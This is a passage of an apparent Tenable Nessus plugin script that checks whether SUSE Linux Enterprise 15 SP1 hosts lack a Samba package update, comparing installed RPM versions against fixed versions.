value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-samr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-samr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-samr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy-python3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy0-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy0-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-ad-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-ad-dc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-core-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-dsdb-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-dsdb-modules-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-libs-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-libs-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libdcerpc-binding0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libdcerpc-binding0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libdcerpc-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libdcerpc-samr-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libdcerpc-samr0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libdcerpc-samr0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libdcerpc0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libdcerpc0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libndr-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libndr-krb5pac-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libndr-krb5pac0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libndr-krb5pac0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libndr-nbt-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libndr-nbt0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libndr-nbt0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libndr-standard-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libndr-standard0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libndr-standard0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libndr0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libndr0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libnetapi-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libnetapi0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libnetapi0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-credentials-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-credentials0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-credentials0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-errors-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-errors0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-errors0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-hostconfig-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-hostconfig0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-hostconfig0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-passdb-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-passdb0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-passdb0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-policy-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-policy-python3-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-policy0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-policy0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-policy0-python3-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-policy0-python3-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-util-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-util0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-util0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamdb-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamdb0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamdb0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsmbclient-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsmbclient0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsmbclient0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsmbconf-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsmbconf0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsmbconf0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsmbldap-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsmbldap2-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsmbldap2-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libtevent-util-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libtevent-util0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libtevent-util0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libwbclient-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libwbclient0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libwbclient0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", 